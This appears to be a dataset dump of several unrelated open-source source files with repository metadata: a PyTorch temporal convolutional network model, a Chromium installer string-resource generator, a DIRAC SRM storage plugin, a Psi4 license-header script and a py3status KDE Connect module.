# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# MIT License
#
# Copyright (c) 2018 CMU Locus Lab
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This file is adapted from
# https://github.com/locuslab/TCN/blob/master/TCN/tcn.py
# https://github.com/locuslab/TCN/blob/master/TCN/adding_problem/add_test.py
import warnings
import torch
import torch.nn as nn
from .utils import PYTORCH_REGRESSION_LOSS_MAP
class Chomp1d(nn.Module):
def __init__(self, chomp_size):
super(Chomp1d, self).__init__()
self.chomp_size = chomp_size
def forward(self, x):
return x[:, :, :-self.chomp_size].contiguous()
class TemporalBlock(nn.Module):
def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding, dropout=0.2,
repo_initialization=True):
super(TemporalBlock, self).__init__()
self.conv1 = nn.Conv1d(n_inputs, n_outputs, kernel_size,
stride=stride, padding=padding, dilation=dilation)
self.bn1 = nn.BatchNorm1d(n_outputs)
self.chomp1 = Chomp1d(padding)
self.relu1 = nn.ReLU()
self.dropout1 = nn.Dropout(dropout)
self.conv2 = nn.Conv1d(n_outputs, n_outputs, kernel_size,
stride=stride, padding=padding, dilation=dilation)
self.bn2 = nn.BatchNorm1d(n_outputs)
self.chomp2 = Chomp1d(padding)
self.relu2 = nn.ReLU()
self.dropout2 = nn.Dropout(dropout)
self.net = nn.Sequential(self.conv1, self.bn1, self.relu1, self.dropout1, self.chomp1,
self.conv2, self.bn2, self.relu2, self.dropout2, self.chomp2)
self.downsample = nn.Conv1d(n_inputs, n_outputs, 1) if n_inputs != n_outputs else None
self.relu = nn.ReLU()
if repo_initialization:
self.init_weights()
def init_weights(self):
self.conv1.weight.data.normal_(0, 0.01)
self.conv2.weight.data.normal_(0, 0.01)
if self.downsample is not None:
self.downsample.weight.data.normal_(0, 0.01)
def forward(self, x):
out = self.net(x)
res = x if self.downsample is None else self.downsample(x)
return self.relu(out + res)
class TemporalConvNet(nn.Module):
def __init__(self,
past_seq_len,
input_feature_num,
future_seq_len,
output_feature_num,
num_channels,
kernel_size=3,
dropout=0.1,
repo_initialization=True):
super(TemporalConvNet, self).__init__()
num_channels.append(output_feature_num)
layers = []
num_levels = len(num_channels)
for i in range(num_levels):
dilation_size = 2 ** i
in_channels = input_feature_num if i == 0 else num_channels[i - 1]
out_channels = num_channels[i]
layers += [TemporalBlock(in_channels, out_channels, kernel_size,
stride=1, dilation=dilation_size,
padding=(kernel_size-1) * dilation_size,
dropout=dropout, repo_initialization=repo_initialization)]
self.tcn = nn.Sequential(*layers)
self.linear = nn.Linear(past_seq_len, future_seq_len)
if repo_initialization:
self.init_weights()
def init_weights(self):
self.linear.weight.data.normal_(0, 0.01)
def forward(self, x):
x = x.permute(0, 2, 1)
y = self.tcn(x)
y = self.linear(y)
y = y.permute(0, 2, 1)
return y
def model_creator(config):
if config.get("num_channels") and (config.get("nhid") and config.get("levels")):
warnings.warn(f"WARNING: You set both num_channels and (nhid, levels) for TCN. "
f"Only num_channels={config['num_channels']} will be effective.")
if config.get("num_channels"):
num_channels = config["num_channels"]
else:
n_hid = config["nhid"] if config.get("nhid") else 30
levels = config["levels"] if config.get("levels") else 8
num_channels = [n_hid] * (levels - 1)
return TemporalConvNet(past_seq_len=config["past_seq_len"],
input_feature_num=config["input_feature_num"],
future_seq_len=config["future_seq_len"],
output_feature_num=config["output_feature_num"],
num_channels=num_channels.copy(),
kernel_size=config.get("kernel_size", 7),
dropout=config.get("dropout", 0.2),
repo_initialization=config.get("repo_initialization", True))
def optimizer_creator(model, config):
return getattr(torch.optim, config.get("optim", "Adam"))(model.parameters(),
lr=config.get("lr", 4e-3))
def loss_creator(config):
loss_name = config.get("loss", "mse")
if loss_name in PYTORCH_REGRESSION_LOSS_MAP:
loss_name = PYTORCH_REGRESSION_LOSS_MAP[loss_name]
else:
raise RuntimeError(f"Got '{loss_name}' for loss name, "
"where 'mse', 'mae' or 'huber_loss' is expected")
return getattr(torch.nn, loss_name)()
# the PytorchBaseModel will only be used for orca.automl
try:
from bigdl.orca.automl.model.base_pytorch_model import PytorchBaseModel
class TCNPytorch(PytorchBaseModel):
def __init__(self, check_optional_config=False):
super().__init__(model_creator=model_creator,
optimizer_creator=optimizer_creator,
loss_creator=loss_creator,
check_optional_config=check_optional_config)
def _get_required_parameters(self):
return {
"past_seq_len",
"input_feature_num",
"future_seq_len",
"output_feature_num"
}
def _get_optional_parameters(self):
return {
"nhid",
"levels",
"kernel_size",
} | super()._get_optional_parameters()
except ImportError:
pass
|
intel-analytics/BigDL
|
python/chronos/src/bigdl/chronos/model/tcn.py
|
Python
|
apache-2.0
| 7,817
|
[
"ORCA"
] |
4575ddeaacb25637afc6502d2945df11045706720e8fcf6799a0b8b2d19871a4
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script generates an rc file and header (setup_strings.{rc,h}) to be
included in setup.exe. The rc file includes translations for strings pulled
from generated_resource.grd and the localized .xtb files.
The header file includes IDs for each string, but also has values to allow
getting a string based on a language offset. For example, the header file
looks like this:
#define IDS_L10N_OFFSET_AR 0
#define IDS_L10N_OFFSET_BG 1
#define IDS_L10N_OFFSET_CA 2
...
#define IDS_L10N_OFFSET_ZH_TW 41
#define IDS_MY_STRING_AR 1600
#define IDS_MY_STRING_BG 1601
...
#define IDS_MY_STRING_BASE IDS_MY_STRING_AR
This allows us to lookup an an ID for a string by adding IDS_MY_STRING_BASE and
IDS_L10N_OFFSET_* for the language we are interested in.
"""
import glob
import os
import sys
from xml.dom import minidom
# We are expected to use ../../../../third_party/python_24/python.exe
from google import path_utils
# Quick hack to fix the path.
sys.path.append(os.path.abspath('../../tools/grit/grit/extern'))
sys.path.append(os.path.abspath('../tools/grit/grit/extern'))
import FP
# The IDs of strings we want to import from generated_resources.grd and include
# in setup.exe's resources.
kStringIds = [
'IDS_PRODUCT_NAME',
'IDS_SXS_SHORTCUT_NAME',
'IDS_PRODUCT_APP_HOST_NAME',
'IDS_PRODUCT_BINARIES_NAME',
'IDS_PRODUCT_DESCRIPTION',
'IDS_PRODUCT_FRAME_NAME',
'IDS_UNINSTALL_CHROME',
'IDS_ABOUT_VERSION_COMPANY_NAME',
'IDS_INSTALL_HIGHER_VERSION',
'IDS_INSTALL_HIGHER_VERSION_APP_HOST',
'IDS_INSTALL_HIGHER_VERSION_CF',
'IDS_INSTALL_HIGHER_VERSION_CB_CF',
'IDS_INSTALL_SYSTEM_LEVEL_EXISTS',
'IDS_INSTALL_FAILED',
'IDS_SAME_VERSION_REPAIR_FAILED',
'IDS_SAME_VERSION_REPAIR_FAILED_CF',
'IDS_SETUP_PATCH_FAILED',
'IDS_INSTALL_OS_NOT_SUPPORTED',
'IDS_INSTALL_OS_ERROR',
'IDS_INSTALL_TEMP_DIR_FAILED',
'IDS_INSTALL_UNCOMPRESSION_FAILED',
'IDS_INSTALL_INVALID_ARCHIVE',
'IDS_INSTALL_INSUFFICIENT_RIGHTS',
'IDS_INSTALL_NO_PRODUCTS_TO_UPDATE',
'IDS_UNINSTALL_COMPLETE',
'IDS_INSTALL_DIR_IN_USE',
'IDS_INSTALL_NON_MULTI_INSTALLATION_EXISTS',
'IDS_INSTALL_MULTI_INSTALLATION_EXISTS',
'IDS_INSTALL_READY_MODE_REQUIRES_CHROME',
'IDS_INSTALL_INCONSISTENT_UPDATE_POLICY',
'IDS_OEM_MAIN_SHORTCUT_NAME',
'IDS_SHORTCUT_TOOLTIP',
'IDS_SHORTCUT_NEW_WINDOW',
'IDS_APP_LAUNCHER_PRODUCT_DESCRIPTION',
'IDS_APP_LAUNCHER_SHORTCUT_TOOLTIP',
'IDS_UNINSTALL_APP_LAUNCHER',
]
# The ID of the first resource string.
kFirstResourceID = 1600
class TranslationStruct:
"""A helper struct that holds information about a single translation."""
def __init__(self, resource_id_str, language, translation):
self.resource_id_str = resource_id_str
self.language = language
self.translation = translation
def __cmp__(self, other):
"""Allow TranslationStructs to be sorted by id."""
id_result = cmp(self.resource_id_str, other.resource_id_str)
return cmp(self.language, other.language) if id_result == 0 else id_result
def CollectTranslatedStrings(branding):
"""Collects all the translations for all the strings specified by kStringIds.
Returns a list of tuples of (string_id, language, translated string). The
list is sorted by language codes."""
strings_file = 'app/chromium_strings.grd'
translation_files = 'chromium_strings*.xtb'
if branding == 'Chrome':
strings_file = 'app/google_chrome_strings.grd'
translation_files = 'google_chrome_strings*.xtb'
kGeneratedResourcesPath = os.path.join(path_utils.ScriptDir(), '..', '..',
'..', strings_file)
kTranslationDirectory = os.path.join(path_utils.ScriptDir(), '..', '..',
'..', 'app', 'resources')
kTranslationFiles = glob.glob(os.path.join(kTranslationDirectory,
translation_files))
# Get the strings out of generated_resources.grd.
dom = minidom.parse(kGeneratedResourcesPath)
# message_nodes is a list of message dom nodes corresponding to the string
# ids we care about. We want to make sure that this list is in the same
# order as kStringIds so we can associate them together.
message_nodes = []
all_message_nodes = dom.getElementsByTagName('message')
for string_id in kStringIds:
message_nodes.append([x for x in all_message_nodes if
x.getAttribute('name') == string_id][0])
message_texts = [node.firstChild.nodeValue.strip() for node in message_nodes]
# The fingerprint of the string is the message ID in the translation files
# (xtb files).
translation_ids = [str(FP.FingerPrint(text)) for text in message_texts]
# Manually put _EN_US in the list of translated strings because it doesn't
# have a .xtb file.
translated_strings = []
for string_id, message_text in zip(kStringIds, message_texts):
translated_strings.append(TranslationStruct(string_id,
'EN_US',
message_text))
# Gather the translated strings from the .xtb files. If an .xtb file doesn't
# have the string we want, use the en-US string.
for xtb_filename in kTranslationFiles:
dom = minidom.parse(xtb_filename)
language = dom.documentElement.getAttribute('lang')
language = language.replace('-', '_').upper()
translation_nodes = {}
for translation_node in dom.getElementsByTagName('translation'):
translation_id = translation_node.getAttribute('id')
if translation_id in translation_ids:
translation_nodes[translation_id] = (translation_node.firstChild
.nodeValue
.strip())
for i, string_id in enumerate(kStringIds):
translated_string = translation_nodes.get(translation_ids[i],
message_texts[i])
translated_strings.append(TranslationStruct(string_id,
language,
translated_string))
translated_strings.sort()
return translated_strings
def WriteRCFile(translated_strings, out_filename):
"""Writes a resource (rc) file with all the language strings provided in
|translated_strings|."""
kHeaderText = (
u'#include "%s.h"\n\n'
u'STRINGTABLE\n'
u'BEGIN\n'
) % os.path.basename(out_filename)
kFooterText = (
u'END\n'
)
lines = [kHeaderText]
for translation_struct in translated_strings:
# Escape special characters for the rc file.
translation = (translation_struct.translation.replace('"', '""')
.replace('\t', '\\t')
.replace('\n', '\\n'))
lines.append(u' %s "%s"\n' % (translation_struct.resource_id_str + '_'
+ translation_struct.language,
translation))
lines.append(kFooterText)
outfile = open(out_filename + '.rc', 'wb')
outfile.write(''.join(lines).encode('utf-16'))
outfile.close()
def WriteHeaderFile(translated_strings, out_filename):
"""Writes a .h file with resource ids. This file can be included by the
executable to refer to identifiers."""
lines = []
do_languages_lines = ['\n#define DO_LANGUAGES']
installer_string_mapping_lines = ['\n#define DO_INSTALLER_STRING_MAPPING']
# Write the values for how the languages ids are offset.
seen_languages = set()
offset_id = 0
for translation_struct in translated_strings:
lang = translation_struct.language
if lang not in seen_languages:
seen_languages.add(lang)
lines.append('#define IDS_L10N_OFFSET_%s %s' % (lang, offset_id))
do_languages_lines.append(' HANDLE_LANGUAGE(%s, IDS_L10N_OFFSET_%s)'
% (lang.replace('_', '-').lower(), lang))
offset_id += 1
else:
break
# Write the resource ids themselves.
resource_id = kFirstResourceID
for translation_struct in translated_strings:
lines.append('#define %s %s' % (translation_struct.resource_id_str + '_'
+ translation_struct.language,
resource_id))
resource_id += 1
# Write out base ID values.
for string_id in kStringIds:
lines.append('#define %s_BASE %s_%s' % (string_id,
string_id,
translated_strings[0].language))
installer_string_mapping_lines.append(' HANDLE_STRING(%s_BASE, %s)'
% (string_id, string_id))
outfile = open(out_filename, 'wb')
outfile.write('\n'.join(lines))
outfile.write('\n#ifndef RC_INVOKED')
outfile.write(' \\\n'.join(do_languages_lines))
outfile.write(' \\\n'.join(installer_string_mapping_lines))
# .rc files must end in a new line
outfile.write('\n#endif // ndef RC_INVOKED\n')
outfile.close()
def main(argv):
# TODO: Use optparse to parse command line flags.
if len(argv) < 2:
print 'Usage:\n %s <output_directory> [branding]' % argv[0]
return 1
branding = ''
if (len(sys.argv) > 2):
branding = argv[2]
translated_strings = CollectTranslatedStrings(branding)
kFilebase = os.path.join(argv[1], 'installer_util_strings')
WriteRCFile(translated_strings, kFilebase)
WriteHeaderFile(translated_strings, kFilebase + '.h')
return 0
if '__main__' == __name__:
sys.exit(main(sys.argv))
|
leighpauls/k2cro4
|
chrome/installer/util/prebuild/create_string_rc.py
|
Python
|
bsd-3-clause
| 9,760
|
[
"xTB"
] |
e23d690a2e18b619f3bcf6f4962491fc8ddd944d360d43657081437651c83dd5
|
""" :mod: GFAL2_SRM2Storage
=================
.. module: python
:synopsis: SRM2 module based on the GFAL2_StorageBase class.
"""
# pylint: disable=invalid-name
import errno
import json
import gfal2 # pylint: disable=import-error
# from DIRAC
from DIRAC import gLogger, gConfig, S_OK, S_ERROR
from DIRAC.Resources.Storage.GFAL2_StorageBase import GFAL2_StorageBase
from DIRAC.Resources.Storage.Utilities import checkArgumentFormat
__RCSID__ = "$Id$"
class GFAL2_SRM2Storage(GFAL2_StorageBase):
""" SRM2 SE class that inherits from GFAL2StorageBase
"""
_INPUT_PROTOCOLS = ['file', 'root', 'srm', 'gsiftp']
_OUTPUT_PROTOCOLS = ['file', 'root', 'dcap', 'gsidcap', 'rfio', 'srm', 'gsiftp']
def __init__(self, storageName, parameters):
""" """
super(GFAL2_SRM2Storage, self).__init__(storageName, parameters)
self.log = gLogger.getSubLogger("GFAL2_SRM2Storage", True)
self.log.debug("GFAL2_SRM2Storage.__init__: Initializing object")
self.pluginName = 'GFAL2_SRM2'
# This attribute is used to know the file status (OFFLINE,NEARLINE,ONLINE)
self._defaultExtendedAttributes = ['user.status']
# ##
# Setting the default SRM parameters here. For methods where this
# is not the default there is a method defined in this class, setting
# the proper values and then calling the base class method.
# ##
self.gfal2requestLifetime = gConfig.getValue('/Resources/StorageElements/RequestLifeTime', 100)
self.__setSRMOptionsToDefault()
# This lists contains the list of protocols to ask to SRM to get a URL
# It can be either defined in the plugin of the SE, or as a global option
if 'ProtocolsList' in parameters:
self.protocolsList = parameters['ProtocolsList'].split(',')
else:
self.log.debug("GFAL2_SRM2Storage: No protocols provided, using the default protocols.")
self.protocolsList = self.defaultLocalProtocols
self.log.debug('GFAL2_SRM2Storage: protocolsList = %s' % self.protocolsList)
def __setSRMOptionsToDefault(self):
''' Resetting the SRM options back to default
'''
self.ctx.set_opt_integer("SRM PLUGIN", "OPERATION_TIMEOUT", self.gfal2Timeout)
if self.spaceToken:
self.ctx.set_opt_string("SRM PLUGIN", "SPACETOKENDESC", self.spaceToken)
self.ctx.set_opt_integer("SRM PLUGIN", "REQUEST_LIFETIME", self.gfal2requestLifetime)
# Setting the TURL protocol to gsiftp because with other protocols we have authorisation problems
# self.ctx.set_opt_string_list( "SRM PLUGIN", "TURL_PROTOCOLS", self.defaultLocalProtocols )
self.ctx.set_opt_string_list("SRM PLUGIN", "TURL_PROTOCOLS", ['gsiftp'])
def _updateMetadataDict(self, metadataDict, attributeDict):
""" Updating the metadata dictionary with srm specific attributes
:param self: self reference
:param dict: metadataDict we want add the SRM specific attributes to
:param dict: attributeDict contains 'user.status' which we then fill in the metadataDict
"""
# 'user.status' is the extended attribute we are interested in
user_status = attributeDict.get('user.status', '')
metadataDict['Cached'] = int('ONLINE' in user_status)
metadataDict['Migrated'] = int('NEARLINE' in user_status)
metadataDict['Lost'] = int(user_status == 'LOST')
metadataDict['Unavailable'] = int(user_status == 'UNAVAILABLE')
metadataDict['Accessible'] = not metadataDict['Lost'] and metadataDict['Cached'] and not metadataDict['Unavailable']
def getTransportURL(self, path, protocols=False):
""" obtain the tURLs for the supplied path and protocols
:param self: self reference
:param str path: path on storage
:param mixed protocols: protocols to use
:returns: Failed dict {path : error message}
Successful dict {path : transport url}
S_ERROR in case of argument problems
"""
res = checkArgumentFormat(path)
if not res['OK']:
return res
urls = res['Value']
self.log.debug(
'GFAL2_SRM2Storage.getTransportURL: Attempting to retrieve tURL for %s paths' %
len(urls))
failed = {}
successful = {}
if not protocols:
listProtocols = self.protocolsList
if not listProtocols:
return S_ERROR(
"GFAL2_SRM2Storage.getTransportURL: No local protocols defined and no defaults found.")
elif isinstance(protocols, basestring):
listProtocols = [protocols]
elif isinstance(protocols, list):
listProtocols = protocols
else:
return S_ERROR("getTransportURL: Must supply desired protocols to this plug-in.")
# Compatibility because of castor returning a castor: url if you ask
# for a root URL, and a root: url if you ask for a xroot url...
if 'root' in listProtocols and 'xroot' not in listProtocols:
listProtocols.insert(listProtocols.index('root'), 'xroot')
elif 'xroot' in listProtocols and 'root' not in listProtocols:
listProtocols.insert(listProtocols.index('xroot') + 1, 'root')
if self.protocolParameters['Protocol'] in listProtocols:
successful = {}
failed = {}
for url in urls:
if self.isURL(url)['Value']:
successful[url] = url
else:
failed[url] = 'getTransportURL: Failed to obtain turls.'
return S_OK({'Successful': successful, 'Failed': failed})
for url in urls:
res = self.__getSingleTransportURL(url, listProtocols)
self.log.debug('res = %s' % res)
if not res['OK']:
failed[url] = res['Message']
else:
successful[url] = res['Value']
return S_OK({'Failed': failed, 'Successful': successful})
def __getSingleTransportURL(self, path, protocols=False):
""" Get the tURL from path with getxattr from gfal2
:param self: self reference
:param str path: path on the storage
:returns: S_OK( Transport_URL ) in case of success
S_ERROR( errStr ) in case of a failure
"""
self.log.debug(
'GFAL2_SRM2Storage.__getSingleTransportURL: trying to retrieve tURL for %s' %
path)
if protocols:
self.ctx.set_opt_string_list("SRM PLUGIN", "TURL_PROTOCOLS", protocols)
res = self._getExtendedAttributes(path, attributes=['user.replicas'])
self.__setSRMOptionsToDefault()
if res['OK']:
return S_OK(res['Value']['user.replicas'])
errStr = 'GFAL2_SRM2Storage.__getSingleTransportURL: Extended attribute tURL is not set.'
self.log.debug(errStr, res['Message'])
return res
def getOccupancy(self, *parms, **kws):
""" Gets the GFAL2_SRM2Storage occupancy info.
TODO: needs gfal2.15 because of bugs:
https://its.cern.ch/jira/browse/DMC-979
https://its.cern.ch/jira/browse/DMC-977
It queries the srm interface for a given space token.
Out of the results, we keep totalsize, guaranteedsize, and unusedsize all in B.
"""
if not self.spaceToken:
self.log.info("getOccupancy: SpaceToken not defined for this SE. Falling back to the default getOccupancy.")
return super(GFAL2_SRM2Storage, self).getOccupancy(*parms, **kws)
# Gfal2 extended parameter name to query the space token occupancy
spaceTokenAttr = 'spacetoken.description?%s' % self.protocolParameters['SpaceToken']
# gfal2 can take any srm url as a base.
spaceTokenEndpoint = self.getURLBase(withWSUrl=True)['Value']
try:
occupancyStr = self.ctx.getxattr(spaceTokenEndpoint, spaceTokenAttr)
try:
occupancyDict = json.loads(occupancyStr)[0]
except ValueError:
# https://its.cern.ch/jira/browse/DMC-977
# a closing bracket is missing, so we retry after adding it
occupancyStr = occupancyStr[:-1] + '}]'
occupancyDict = json.loads(occupancyStr)[0]
# https://its.cern.ch/jira/browse/DMC-979
# We set totalsize to guaranteed size
# (it is anyway true for all the SEs I could test)
occupancyDict['totalsize'] = occupancyDict.get('guaranteedsize', 0)
except (gfal2.GError, ValueError) as e:
errStr = 'Something went wrong while checking for spacetoken occupancy.'
self.log.verbose(errStr, e.message)
return S_ERROR(getattr(e, 'code', errno.EINVAL), "%s %s" % (errStr, repr(e)))
sTokenDict = {}
sTokenDict['Total'] = float(occupancyDict.get('totalsize', '0'))
sTokenDict['Free'] = float(occupancyDict.get('unusedsize', '0'))
sTokenDict['SpaceReservation'] = self.protocolParameters['SpaceToken']
return S_OK(sTokenDict)
|
andresailer/DIRAC
|
Resources/Storage/GFAL2_SRM2Storage.py
|
Python
|
gpl-3.0
| 8,520
|
[
"DIRAC"
] |
de38fc3ba57e6eb487bf1a6cca61f037bd1addd8bdeba7b2a267d416534f6e3a
|
# Checks all psi4 relevant files for proper boilerplate GNU license.
# This is sold as is with no warrenty-- probably should double check everything
# after running. I am not responsible if you break Psi4.
#
# Do not forget to do share/plugins by hand!
import os
# File type we know how to handle
ftypes = ['cc', 'h', 'py']
c_header ="""/*
* @BEGIN LICENSE
*
* Psi4: an open-source quantum chemistry software package
*
* Copyright (c) 2007-2018 The Psi4 Developers.
*
* The copyrights for code used from other parties are included in
* the corresponding files.
*
* This file is part of Psi4.
*
* Psi4 is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, version 3.
*
* Psi4 is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License along
* with Psi4; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
* @END LICENSE
*/"""
py_header = c_header.replace(' */', '#')
py_header = py_header.replace('/*', '#')
py_header = py_header.replace(' *', '#')
c_header = c_header.splitlines()
py_header = py_header.splitlines()
def check_header(infile):
f = open(infile, 'r+')
data = f.read().splitlines()
# Find the header location
max_lines = 30
try:
symbol = None
if filename.split('.')[-1] in ['py']:
start = data.index("# @BEGIN LICENSE") - 1
end = data.index("# @END LICENSE") + 1
if data[start] != '#' or data[end] != '#':
f.close()
print('Did not find "wings" of license block in file %s' % infile)
return
else:
start = data.index(" * @BEGIN LICENSE") - 1
end = data.index(" * @END LICENSE") + 1
if data[start] != '/*' or data[end] != ' */':
f.close()
print('Did not find "wings" of license block in file %s' % infile)
return
except:
print('Could not find license block in file %s' % infile)
f.close()
return
# Make sure the block actually looks like a license
license = data[start:end+1]
top = any("PSI4:" in x.upper() for x in license[:5])
bot = any("51 Franklin Street" in x for x in license[5:])
if not (top and bot):
print('Did not understand infile %s' % infile)
f.close()
return
# Replace license
if filename.split('.')[-1] in ['cc', 'h']:
data[start:end + 1] = c_header
elif filename.split('.')[-1] in ['py']:
data[start:end + 1] = py_header
else:
print('Did not understand infile end: %s' % infile)
f.close()
return
# Write it out
f.seek(0)
f.write("\n".join(data))
f.truncate()
f.close()
avoid_strings = ['qcdb', 'libJKFactory']
walk = list(os.walk('../../src/'))
walk += list(os.walk('../python'))
for root, dirnames, filenames in walk:
if any(x in root for x in avoid_strings):
continue
for filename in filenames:
if filename.split('.')[-1] not in ftypes:
continue
check_header(root + '/' + filename)
|
amjames/psi4
|
psi4/share/psi4/scripts/apply_license.py
|
Python
|
lgpl-3.0
| 3,497
|
[
"Psi4"
] |
b2167c6ea3755a044afa2588075c5efa3e8dd2bdcabe71c2a1ed7242e89f9667
|
"""
Display information about your smartphone with KDEConnector.
Configuration parameters:
cache_timeout: how often we refresh this module in seconds (default 30)
device: the device name, you need this if you have more than one device
connected to your PC (default None)
device_id: alternatively to the device name you can set your device id here
(default None)
format: see placeholders below
(default '{name}{notif_status} {bat_status} {charge}%')
format_disconnected: text if device is disconnected
(default 'device disconnected')
low_threshold: percentage value when text is twitch to color_bad
(default 20)
status_bat: text when battery is discharged (default '⬇')
status_chr: text when device is charged (default '⬆')
status_full: text when battery is full (default '☻')
status_no_notif: text when you have no notifications (default '')
status_notif: text when notifications are available (default ' ✉')
Format placeholders:
{bat_status} battery state
{charge} the battery charge
{name} name of the device
{notif_size} number of notifications
{notif_status} shows if a notification is available or not
Color options:
color_bad: Device unknown, unavailable
or battery below low_threshold and not charging
color_degraded: Connected and battery not charging
color_good: Connected and battery charging
Requires:
pydbus: pythonic d-bus library
kdeconnect: adds communication between kde and your smartphone
Examples:
```
kdeconnector {
device_id = "aa0844d33ac6ca03"
format = "{name} {battery} ⚡ {state}"
low_battery = "10"
}
```
@author Moritz Lüdecke
SAMPLE OUTPUT
{'color': '#00FF00', 'full_text': u'Samsung Galaxy S6 \u2709 \u2B06 97%'}
charging
{'color': '#00FF00', 'full_text': u'Samsung Galaxy S6 \u2B06 97%'}
transition
{'color': '#FFFF00', 'full_text': u'Samsung Galaxy S6 \u2B07 93%'}
not-plugged
{'color': '#FF0000', 'full_text': u'Samsung Galaxy S6 \u2B07 92%'}
disconnected
{'color': '#FF0000', 'full_text': u'device disconnected'}
unknown
{'color': '#FF0000', 'full_text': u'unknown device'}
"""
from pydbus import SessionBus
SERVICE_BUS = "org.kde.kdeconnect"
INTERFACE = SERVICE_BUS + ".device"
INTERFACE_DAEMON = SERVICE_BUS + ".daemon"
INTERFACE_BATTERY = INTERFACE + ".battery"
INTERFACE_NOTIFICATIONS = INTERFACE + ".notifications"
PATH = "/modules/kdeconnect"
DEVICE_PATH = PATH + "/devices"
BATTERY_SUBPATH = "/battery"
NOTIFICATIONS_SUBPATH = "/notifications"
UNKNOWN = "Unknown"
UNKNOWN_DEVICE = "unknown device"
UNKNOWN_SYMBOL = "?"
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 30
device = None
device_id = None
format = "{name}{notif_status} {bat_status} {charge}%"
format_disconnected = "device disconnected"
low_threshold = 20
status_bat = "⬇"
status_chr = "⬆"
status_full = "☻"
status_no_notif = ""
status_notif = " ✉"
def post_config_hook(self):
self._bat = None
self._dev = None
self._not = None
def _init_dbus(self):
"""
Get the device id
"""
_bus = SessionBus()
if self.device_id is None:
self.device_id = self._get_device_id(_bus)
if self.device_id is None:
return False
try:
self._dev = _bus.get(SERVICE_BUS, DEVICE_PATH + f"/{self.device_id}")
try:
self._bat = _bus.get(
SERVICE_BUS, DEVICE_PATH + f"/{self.device_id}" + BATTERY_SUBPATH
)
self._not = _bus.get(
SERVICE_BUS,
DEVICE_PATH + f"/{self.device_id}" + NOTIFICATIONS_SUBPATH,
)
except Exception:
# Fallback to the old version
self._bat = None
self._not = None
except Exception:
return False
return True
def _get_device_id(self, bus):
"""
Find the device id
"""
_dbus = bus.get(SERVICE_BUS, PATH)
devices = _dbus.devices()
if self.device is None and self.device_id is None and len(devices) == 1:
return devices[0]
for id in devices:
self._dev = bus.get(SERVICE_BUS, DEVICE_PATH + f"/{id}")
if self.device == self._dev.name:
return id
return None
def _get_isTrusted(self):
if self._dev is None:
return False
try:
# New method which replaced 'isPaired' in version 1.0
return self._dev.isTrusted()
except AttributeError:
try:
# Deprecated since version 1.0
return self._dev.isPaired()
except AttributeError:
return False
def _get_device(self):
"""
Get the device
"""
try:
device = {
"name": self._dev.name,
"isReachable": self._dev.isReachable,
"isTrusted": self._get_isTrusted(),
}
except Exception:
return None
return device
def _get_battery(self):
"""
Get the battery
"""
try:
if self._bat:
charge = self._bat.charge
isCharging = self._bat.isCharging
else:
charge = self._dev.charge()
isCharging = self._dev.isCharging()
battery = {
"charge": charge,
"isCharging": isCharging == 1,
}
except Exception:
return None
return battery
def _get_notifications(self):
"""
Get notifications
"""
try:
if self._not:
notifications = {"activeNotifications": self._not.activeNotifications()}
else:
notifications = {"activeNotifications": self._dev.activeNotifications()}
notifications = {"activeNotifications": notifications}
except Exception:
return None
return notifications
def _get_battery_status(self, battery):
"""
Get the battery status
"""
if not battery or battery["charge"] == -1:
return (UNKNOWN_SYMBOL, UNKNOWN, "#FFFFFF")
if battery["isCharging"]:
status = self.status_chr
color = self.py3.COLOR_GOOD
else:
status = self.status_bat
color = self.py3.COLOR_DEGRADED
if not battery["isCharging"] and battery["charge"] <= self.low_threshold:
color = self.py3.COLOR_BAD
if battery["charge"] > 99:
status = self.status_full
return (battery["charge"], status, color)
def _get_notifications_status(self, notifications):
"""
Get the notifications status
"""
if notifications:
size = len(notifications["activeNotifications"])
else:
size = 0
status = self.status_notif if size > 0 else self.status_no_notif
return (size, status)
def _get_text(self):
"""
Get the current metadatas
"""
device = self._get_device()
if device is None:
return (UNKNOWN_DEVICE, self.py3.COLOR_BAD)
if not device["isReachable"] or not device["isTrusted"]:
return (
self.py3.safe_format(
self.format_disconnected, {"name": device["name"]}
),
self.py3.COLOR_BAD,
)
battery = self._get_battery()
(charge, bat_status, color) = self._get_battery_status(battery)
notif = self._get_notifications()
(notif_size, notif_status) = self._get_notifications_status(notif)
return (
self.py3.safe_format(
self.format,
dict(
name=device["name"],
charge=charge,
bat_status=bat_status,
notif_size=notif_size,
notif_status=notif_status,
),
),
color,
)
def kdeconnector(self):
"""
Get the current state and return it.
"""
if self._init_dbus():
(text, color) = self._get_text()
else:
text = UNKNOWN_DEVICE
color = self.py3.COLOR_BAD
response = {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": text,
"color": color,
}
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
ultrabug/py3status
